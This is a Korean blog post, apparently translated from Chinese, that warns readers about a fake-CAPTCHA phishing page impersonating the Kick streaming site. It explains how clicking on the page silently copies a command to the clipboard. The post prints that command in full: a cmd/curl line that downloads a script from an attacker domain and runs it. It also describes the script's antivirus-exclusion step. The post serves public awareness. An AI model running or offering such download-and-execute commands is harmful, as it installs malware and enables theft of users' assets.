어업! 어업! 낚시 트로이목마를 다시 만나보세요! ! !
子布说
01-11 07:00
本文约944字,阅读全文需要约4分钟
또 다른 친구는 낚시 트로이 목마에 빠졌습니다. 그는 어떻게 낚시 함정에 빠졌습니까?

아침에 여러 그룹의 채팅 기록을 보았는데, 한 노인이 가짜 피싱 사이트를 방문했는데 그의 컴퓨터가 트로이 목마에 감염되어 그의 자산을 도난당했다는 내용이었습니다. 그의 도난 과정을 분석해 보겠습니다.

위 채팅 기록에서 볼 수 있듯이 그는 다음 URL의 가짜 Kick 웹사이트를 방문했습니다: https://kick.com.im/

중요 알림: 이 웹사이트는 피싱 웹사이트이므로 방문하지 마세요! ! ! 피싱사이트입니다, 방문하지 마세요! ! ! 피싱사이트입니다, 방문하지 마세요! ! !

이 웹 사이트를 방문하면 사람인지 여부가 확인됩니다. 확인을 클릭하면 다음 메시지가 나타납니다.

위 그림에서 요구하는 작업을 설명해 보겠습니다.

1. Windows+R을 눌러 실행 대화 상자를 엽니다.

Windows+R은 Windows 시스템에서 실행 대화 상자를 빠르게 여는 데 사용되는 바로 가기 명령입니다. 여기에서 악성 스크립트 파일을 실행할 준비가 됩니다.

2. CTRL+V를 눌러 인증 텍스트를 붙여넣으세요.

붙여넣기에는 CTRL+V가 사용된다는 것은 다들 아시죠? 이 단계에서 궁금한 점이 있으신가요? Ctrl+V를 누르기 전에 복사하지 않고 붙여넣는 이유는 무엇인가요?

피싱 웹사이트의 프런트엔드 코드를 살펴보겠습니다.

비밀은 여기에 있습니다. 우리가 처음 웹 사이트를 방문했을 때 우리가 인간인지 확인하라는 메시지가 표시되었습니다. 확인하려면 마우스를 클릭해야 했습니다. 위의 js 코드는 마우스 클릭 이벤트를 감지하는 것입니다. 발견되면 악성 스크립트가 자동으로 페이스트보드에 복사됩니다. 이때 CTRL+C를 사용하지 않고 바로 CTRL+V를 누를 수 있습니다.

그럼 페이스트리 속 악성코드는 무엇일까요?

cmd /c "curl -k -L -Ss https://hcaptcha.ru/r -o "%TEMP%\ 1.cmd" && "%TEMP%\ 1.cmd"" # 확인을 완료하려면 확인 또는 Enter 키를 누르세요. . 확인을 누르면 로봇이 아님을 확인하게 됩니다.

위 코드는 https://hcaptcha.ru/r의 의미입니다 ( 중요 알림: 피싱 웹사이트입니다. 방문하지 마세요!!! 피싱 웹사이트입니다. 방문하지 마세요!!! 피싱 웹사이트입니다. 방문하지 마세요!!! ) 파일을 다운로드하여 임시 디렉터리에 저장한 후, 이 파일을 실행하세요.

다운로드한 파일을 열고 다음 코드를 찾으세요.

이 악성 코드는 먼저 사용자에게 관리자 권한이 있는지 확인합니다. 관리자 권한이 있으면 스크립트를 관리자 권한으로 승격시키려고 합니다.

코드의 두 번째 부분은 Base 64로 인코딩되었으며, 디코딩 시 바이러스 백신 검사에서 C:\를 제외하는 것으로 나타났습니다. 이 단계의 목적은 바이러스 백신 소프트웨어에 "C:|검사하지 마세요!"를 알려주어 C 드라이브에서 트로이 목마가 실행될 때 바이러스 백신 소프트웨어에 의해 발견되지 않도록 하는 것입니다.

코드의 세 번째 부분인 gpt는 구문 분석되지 않았습니다. 일반적인 목적은 웹사이트에서 C 드라이브로 트로이 목마를 다운로드한 다음 트로이 목마를 실행하는 것입니다. 이를 위해서는 @evilcos 와 같은 보안 전문가의 자세한 분석이 필요합니다.

위의 피싱 사기를 통해 다음과 같은 경험을 얻을 수 있습니다.

1. 낯선 사이트에 접속하기 전 해당 사이트가 맞는지 반드시 확인하세요. 위의 피해자처럼 kick 라이브 방송 URL을 피싱 사이트로 착각한 사람입니다. kick의 공식 URL은 https://kick.com/ 입니다 . 피해자가 구글에서 검색하거나 gpt에 대해 물어보면 속지 않습니다.

2. 각 작업을 수행하기 전에 주의해야 합니다. 이해하지 못하거나 불분명한 경우에는 GPT와 같은 AI 도구를 잘 사용해야 합니다.

Web3에는 함정이 가득합니다. 모두가 함정을 피할 수 있기를 바랍니다.

子布说
作者文库